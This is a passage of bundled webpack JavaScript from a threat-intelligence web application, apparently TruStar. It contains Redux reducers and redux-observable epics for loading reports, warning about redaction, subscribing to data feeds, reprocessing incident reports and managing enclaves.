 * report the user wants to edit is already in state (we could decide to make
 * this assumption in order to greatly sipmplify this logic). So we see if the
 * report is in state. If it is, then we load its data in to the form. If it's
 * not, then we go fetch it from the server and THEN do the same thing. There is
 * certainly a better way to make this happen, but that can come after large
 * refactor.
 */
var loadReportEpic = function loadReportEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["LOAD_REPORT_DATA"]).map(Object(__WEBPACK_IMPORTED_MODULE_8_ramda__["prop"])('payload')).mergeMap(function (_ref18) {
    var guid = _ref18.guid,
        release = _ref18.release,
        enclaveToCopyTo = _ref18.enclaveToCopyTo;

    var state = store.getState();
    var report = Object(__WEBPACK_IMPORTED_MODULE_11_modules_reports_getters_js__["reportOrListItem"])(guid)(state);

    /* User may be in "Redact & Release" phase, in which case 'release' signifies
     * we should set the distribtion to COMMUNITY when populating the form */
    // TODO: Should we remove this piece of code?
    var distributionType = release ? 'COMMUNITY' : 'ENCLAVE';
    var enclaves = report.get('enclaves', Object(__WEBPACK_IMPORTED_MODULE_6_immutable__["OrderedMap"])());
    var formValues = toUpdate(report, distributionType, enclaves);

    // Note: enclaveToCopyTo implies we are COPYING this entry
    var action = {
      type: __WEBPACK_IMPORTED_MODULE_20__action_types_js__["LOAD_EXISTING_REPORT_CONTENT"],
      payload: { currentValues: formValues, enclaveToCopyTo: enclaveToCopyTo }
    };

    return report ? __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of(action) : __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].of(Object(__WEBPACK_IMPORTED_MODULE_14_modules_reports_actions_js__["fetchAndStore"])(guid)).merge(action$.ofType(__WEBPACK_IMPORTED_MODULE_15_modules_reports_action_types_js__["Q" /* STORE_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_8_ramda__["prop"])('payload')).map(function (report) {
      return action;
    }));
  });
};

/* This redaction serves a warning message if you toggle off redaction in the report review page */
var redactionWarningEpic = function redactionWarningEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_20__action_types_js__["TOGGLE_REDACTION"]).filter(function () {
    return !Object(__WEBPACK_IMPORTED_MODULE_9__getters_js__["applyRedaction"])(store.getState());
  }).mapTo(Object(__WEBPACK_IMPORTED_MODULE_16_modules_alerts_actions_js__["warn"])('NOTE: Turning redaction off will submit all the text in the report.')).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_1_rxjs__["Observable"].empty();
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_4_redux_observable__["combineEpics"])(reviewReportEpic, invalidSubmissionEpic, invalidUpdateEpic, submitReportEpic, submitIndicatorsEpic, updateReportEpic, validateFileEpic, uploadFileEpic, uploadIndicatorsFileEpic, loadReportEpic, redactionWarningEpic));

/***/ }),
/* 2910 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchFeeds", function() { return fetchFeeds; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "subscribe", function() { return subscribe; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(496);




/**
 * Fetch all possible data feeds for user.
 */
var fetchFeeds = function fetchFeeds() {
  var payload = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getQueryParams"])();
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* FETCH_ALL */],
    payload: payload
  };
};

/**
 * Subscribe user's company to a data feed.
 */
var subscribe = function subscribe(id) {
  var credentials = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : null;
  var origin = arguments[2];
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* SUBSCRIBE */],
    payload: { id: id, credentials: credentials, origin: origin }
  };
};

/***/ }),
/* 2911 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export feeds */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(496);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__types_js__ = __webpack_require__(712);








/* **************************************************************************
 * DATA FEEDS
 * *************************************************************************/

var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(list).toOrderedMap().map(__WEBPACK_IMPORTED_MODULE_3__types_js__["DataFeed"]).mapKeys(function (k, v) {
    return v.get('guid');
  });
};

var feeds = function feeds() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* FETCH_ALL_SUCCESS */]:
      return listToOrderedMap(payload);
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* FETCH_ALL */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["d" /* SUBSCRIBE */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* FETCH_ALL_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* FETCH_ALL_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["f" /* SUBSCRIBE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_2__action_types_js__["e" /* SUBSCRIBE_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  feeds: feeds,
  loading: loading
}));

/***/ }),
/* 2912 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_data_feeds__ = __webpack_require__(298);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__constants_js__ = __webpack_require__(1307);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__action_types_js__ = __webpack_require__(496);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_enclave_actions_js__ = __webpack_require__(1308);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_modules_profile_actions_js__ = __webpack_require__(571);








var debug = __WEBPACK_IMPORTED_MODULE_5_debug___default()('app:modules:data-feeds:epics'); // eslint-disable-line no-unused-vars







/** Fetch all data feeds */
var fetchAllEpic = function fetchAllEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types_js__["a" /* FETCH_ALL */]).mergeMap(function () {
    return ajax.get('' + __WEBPACK_IMPORTED_MODULE_7__constants_js__["FEEDS_ENDPOINT"]).map(function (_ref2) {
      var response = _ref2.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_8__action_types_js__["c" /* FETCH_ALL_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_8__action_types_js__["b" /* FETCH_ALL_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

/** Subscribe to a data feed */
var subscribeEpic = function subscribeEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_8__action_types_js__["d" /* SUBSCRIBE */]).mergeMap(function (_ref4) {
    var _ref4$payload = _ref4.payload,
        id = _ref4$payload.id,
        credentials = _ref4$payload.credentials,
        origin = _ref4$payload.origin;

    var state = store.getState();
    var credentialsType = __WEBPACK_IMPORTED_MODULE_4_modules_data_feeds__["getters"].feed(id)(state).credentialsType;
    // Sending data as a RequestBody
    var data = credentials.set('credentialsType', credentialsType);
    return ajax.postJSON(Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["querystring"])({ origin: origin }, __WEBPACK_IMPORTED_MODULE_7__constants_js__["FEEDS_ENDPOINT"] + '/' + id + '/subscribe'), data).mergeMap(function (_ref5) {
      var response = _ref5.response;

      return [{
        type: __WEBPACK_IMPORTED_MODULE_8__action_types_js__["f" /* SUBSCRIBE_SUCCESS */],
        payload: response,
        meta: {
          alert: { type: 'success', text: 'Subscribed successfully.' }
        }
      }, Object(__WEBPACK_IMPORTED_MODULE_9_modules_enclave_actions_js__["fetch"])(), Object(__WEBPACK_IMPORTED_MODULE_10_modules_profile_actions_js__["fetch"])()];
    }).catch(function (err) {
      var errMsg = err.status >= 400 && err.status < 500 ? err.response.message : '';
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_8__action_types_js__["e" /* SUBSCRIBE_FAILURE */],
        meta: {
          alert: { type: 'error', text: 'Subscription failed. ' + errMsg }
        }
      });
    });
  });
};

/** Export all data-feed epics */
/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchAllEpic, subscribeEpic));

/***/ }),
/* 2913 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setReindexOptions", function() { return setReindexOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reprocessReports", function() { return reprocessReports; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(713);



var setReindexOptions = function setReindexOptions(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["d" /* SET_REINDEX_OPTIONS */],
    payload: payload
  };
};

var reprocessReports = function reprocessReports(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* REPROCESS_REPORTS */],
    payload: payload
  };
};

/***/ }),
/* 2914 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reindexOptions", function() { return reindexOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reprocessReports", function() { return reprocessReports; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);


var reindexOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['devtasks', 'reindexOptions']);
var reprocessReports = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['devtasks', 'reprocessReports']);

/***/ }),
/* 2915 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export reprocessReports */
/* unused harmony export reindexOptions */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(713);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types_js__ = __webpack_require__(2916);



/**
 * NOTE: Only default export should be used. It should be the root reducer.
 * Other exports ore only to allow importing into our tests.
 */





var reprocessReports = function reprocessReports() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_2__types_js__["b" /* Status */])();
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* REPROCESS_REPORTS */]:
      return state.merge({ loading: true });
    case __WEBPACK_IMPORTED_MODULE_1__action_types_js__["c" /* REPROCESS_REPORTS_SUCCESS */]:
      return state.merge({ loading: false, complete: true });
    case __WEBPACK_IMPORTED_MODULE_1__action_types_js__["b" /* REPROCESS_REPORTS_FAILURE */]:
      return state.merge({ loading: false });
    default:
      return state;
  }
};

var reindexOptions = function reindexOptions() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_2__types_js__["a" /* ReindexOptions */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* SET_REINDEX_OPTIONS */]:
      return state.merge(payload);
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  reprocessReports: reprocessReports,
  reindexOptions: reindexOptions
}));

/***/ }),
/* 2916 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return Status; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ReindexOptions; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var Status = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  loading: false,
  complete: false
});

var ReindexOptions = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  dateSince: null,
  dateUntil: null,
  enclaveGuid: null
});

/***/ }),
/* 2917 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export REPROCESS_REPORTS_ENDPOINT */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__action_types_js__ = __webpack_require__(713);





var REPROCESS_REPORTS_ENDPOINT = '/services/incident-reports/reprocess-all';
/**
 * Reprocess incident reports.
 */
var reprocessReportsEpic = function reprocessReportsEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_2__action_types_js__["a" /* REPROCESS_REPORTS */]).mergeMap(function (x) {
    if (x.payload && x.payload.dateSince && x.payload.dateUntil) {
      return ajax.post(REPROCESS_REPORTS_ENDPOINT, x.payload).mapTo({ type: __WEBPACK_IMPORTED_MODULE_2__action_types_js__["c" /* REPROCESS_REPORTS_SUCCESS */] }).catch(function (err) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
          type: __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* REPROCESS_REPORTS_FAILURE */],
          error: true,
          payload: err,
          meta: {
            alert: { type: 'error', text: 'An error occurred re-processing incident reports.' }
          }
        });
      });
    } else {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_2__action_types_js__["b" /* REPROCESS_REPORTS_FAILURE */],
        error: true,
        payload: new Error('Both date fields must be selected.'),
        meta: {
          alert: { type: 'error', text: 'Both date fields must be selected.' }
        }
      });
    }
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(reprocessReportsEpic));

/***/ }),
/* 2918 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export listToOrderedMap */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__types_js__ = __webpack_require__(99);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__action_types_js__ = __webpack_require__(356);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_icons_action_types_js__ = __webpack_require__(177);






var debug = __WEBPACK_IMPORTED_MODULE_2_debug___default()('app:modules:enclave:epics'); // eslint-disable-line no-unused-vars






var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_3_immutable__["fromJS"])(list).toOrderedMap().map(__WEBPACK_IMPORTED_MODULE_5__types_js__["i" /* createEnclave */]).mapKeys(function (k, v) {
    return v.get('id');
  });
};

var fetchEpic = function fetchEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["d" /* FETCH */]).mergeMap(function () {
    return ajax.get(__WEBPACK_IMPORTED_MODULE_5__types_js__["b" /* ENCLAVES_ENDPOINT */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(listToOrderedMap).map(function (enclaves) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["f" /* FETCH_SUCCESS */],
        payload: enclaves
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["e" /* FETCH_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

var saveEnclaveEpic = function saveEnclaveEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["g" /* SAVE */]).mergeMap(function (_ref3) {
    var payload = _ref3.payload,
        meta = _ref3.meta;

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_5__types_js__["b" /* ENCLAVES_ENDPOINT */], payload).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(__WEBPACK_IMPORTED_MODULE_5__types_js__["i" /* createEnclave */]).mergeMap(function (enc) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["i" /* SAVE_SUCCESS */],
        payload: enc,
        meta: {
          alert: { type: 'success', text: payload.get('name') + ' enclave saved successfully.' }
        }
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["h" /* SAVE_FAILURE */],
        meta: {
          alert: { type: 'error', text: payload.get('name') + ' enclave could not be saved. Please reload this page and try again.' }
        }
      });
    });
  });
};

var saveEnclaveIconEpic = function saveEnclaveIconEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return (
    // first, consume a SAVE event, meaning an enclave is being saved
    action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["g" /* SAVE */]).switchMap(function (_ref5) {
      var meta = _ref5.meta;
      return (
        // wait until a the enclave is saved successfully
        action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["i" /* SAVE_SUCCESS */]).take(1).mergeMap(function (_ref6) {
          var payload = _ref6.payload;
          return (
            // dispatch a SAVE_ENCLAVE_ICON event, combining the enclave GUID
            // from the SAVE_SUCCESS event and the file from the SAVE event
            meta.file ? __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
              type: __WEBPACK_IMPORTED_MODULE_7_modules_icons_action_types_js__["a" /* SAVE_ENCLAVE_ICON */],
              payload: {
                guid: payload.id,
                file: meta.file
              }
            }) : __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty()
          );
        })
        // break the flow if the enclave fails to save
        .takeUntil(action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["h" /* SAVE_FAILURE */]))
      );
    })
  );
};

var deleteEnclaveEpic = function deleteEnclaveEpic(action$, store, _ref7) {
  var ajax = _ref7.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["a" /* DELETE */]).mergeMap(function (_ref8) {
    var id = _ref8.payload;

    return ajax.delete(__WEBPACK_IMPORTED_MODULE_5__types_js__["b" /* ENCLAVES_ENDPOINT */] + '/' + id).mergeMap(function (_ref9) {
      var response = _ref9.response;

      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["c" /* DELETE_SUCCESS */],
        payload: id,
        meta: {
          alert: { type: 'success', text: 'Enclave deleted. Companies and users will no longer have access to it.' }
        }
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["b" /* DELETE_FAILURE */],
        meta: {
          alert: { type: 'error', text: 'Enclave could not be deleted. Please reload this page and try again' }
        }
      });
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(fetchEpic, saveEnclaveEpic, saveEnclaveIconEpic, deleteEnclaveEpic));

/***/ }),
/* 2919 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export enclaves */
/* unused harmony export enclavesQueryResult */
/* unused harmony export options */
/* unused harmony export colors */
/* unused harmony export loading */
/* unused harmony export queriedEnclavesLoading */
/* unused harmony export loaded */
/* unused harmony export serialize */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable_constants__ = __webpack_require__(705);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable_constants___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable_constants__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__action_types_js__ = __webpack_require__(497);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_icons_action_types_js__ = __webpack_require__(177);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_enclave_types_js__ = __webpack_require__(99);













var enclaves = function enclaves() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* FETCH_SUCCESS */]:
      return payload;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["l" /* SAVE_SUCCESS */]:
      return state.set(payload.id, payload);
    case __WEBPACK_IMPORTED_MODULE_6_modules_icons_action_types_js__["c" /* SAVE_ENCLAVE_ICON_SUCCESS */]:
      var fieldToSave = payload.iconUrl.includes('.svg') ? 'iconSvgUrl' : 'iconUrl';
      return state.setIn([payload.guid, fieldToSave], payload.iconUrl);
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* DELETE_SUCCESS */]:
      return state.delete(payload);
    default:
      return state;
  }
};
/**
 * Why have an additional store item for enclaves? Because enclaves is hooked to too many codependent objects so querying on it
 * tends have to have unexpected side effects. This is not the most elegant solution, but this will provide any enclave filtering
 * tools that require redux to get their search results here without it effecting the general enclave map
 * @param state
 * @param action
 * @returns {Map<K, V>|*|Map<*, V>|State|Map<*, *>}
 */
var enclavesQueryResult = function enclavesQueryResult() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["i" /* FETCH_WITH_QUERY_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["n" /* SET_QUERY_RESULTS */]:
      // SET is used to manually set the result, such as when resetting
      return payload;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["l" /* SAVE_SUCCESS */]:
      return state.set(payload.id, payload);
    case __WEBPACK_IMPORTED_MODULE_6_modules_icons_action_types_js__["c" /* SAVE_ENCLAVE_ICON_SUCCESS */]:
      var fieldToSave = payload.iconUrl.includes('.svg') ? 'iconSvgUrl' : 'iconUrl';
      return state.setIn([payload.guid, fieldToSave], payload.iconUrl);
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* DELETE_SUCCESS */]:
      return state.delete(payload);
    default:
      return state;
  }
};

var options = function options() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_7_modules_enclave_types_js__["d" /* Options */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["m" /* SET_DISPLAY_OPTIONS */]:
      return state.merge(payload);
    default:
      return state;
  }
};

/**
 * NOTE: Pre-existing state always takes precedence over new color state. This
 * is because we persist colors specifically for consistency so we favor the
 * existing values over new values.
 */
var colors = function colors() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {

    // NOTE: The reason we do this manually is that the rehydrate action
    // overwrites state. They recommend buffering actions so as to ensure the
    // rehydration happens first, but this is tough since som of our epics are
    // stateful
    case __WEBPACK_IMPORTED_MODULE_4_redux_persist_immutable_constants__["REHYDRATE"]:
      // NOTE: Yeah, payload is a very odd plain object of app state keys mapped
      // to the serialized app state... so we have a plain object with immutable
      // objects at each key
      try {
        return state.merge(payload.enclaves.get('colors'));
      } catch (err) {
        return state;
      }

    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* FETCH_SUCCESS */]:
      return payload.map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('color')).merge(state);
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["l" /* SAVE_SUCCESS */]:
      return state.update(payload.id, function (c) {
        return c || payload.color;
      });
    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["d" /* FETCH */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["j" /* SAVE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["a" /* DELETE */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["e" /* FETCH_FAILURE */]:
